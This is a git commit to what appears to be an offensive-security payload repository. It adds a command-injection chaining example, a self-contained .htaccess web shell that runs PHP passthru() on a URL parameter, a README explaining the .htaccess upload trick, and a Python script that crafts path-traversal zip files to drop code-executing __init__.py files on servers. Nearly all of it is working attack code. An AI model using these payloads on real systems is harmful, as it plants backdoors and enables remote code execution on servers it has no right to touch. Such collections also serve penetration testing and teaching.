Upload .htaccess to PHP code exec

patch-1
Swissky 2017-10-09 23:17:31 +02:00
parent 6ad7965efc
commit a2d5fe5cad
17 changed files with 61 additions and 0 deletions

View File

@ -17,6 +17,7 @@ Commands execution by chaining commands
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls Only if the first cmd fail
```
Commands execution inside a command

View File

@ -0,0 +1,14 @@
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

View File

@ -0,0 +1,27 @@
# .htaccess upload
Uploading an .htaccess file to override Apache rule and execute PHP.
"Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
Self contained .htaccess web shell
```
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
```
## Thanks to
* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen ](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
* [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)

View File

@ -0,0 +1,19 @@
# Generating "evil" zip file
# Based on the work of Ajin Abraham
# Vuln website : https://github.com/ajinabraham/bad_python_extract
# More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution
# Warning 1: need a restart from the server OR debug=True
# Warning 2: you won't get the output of the command (blind rce)
import zipfile
directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"]
for d in directories:
name = "python-"+d+"-__init__.py.zip"
zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)
zipf.close()
z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
z_info.external_attr = 0777 << 16L
z_file.close()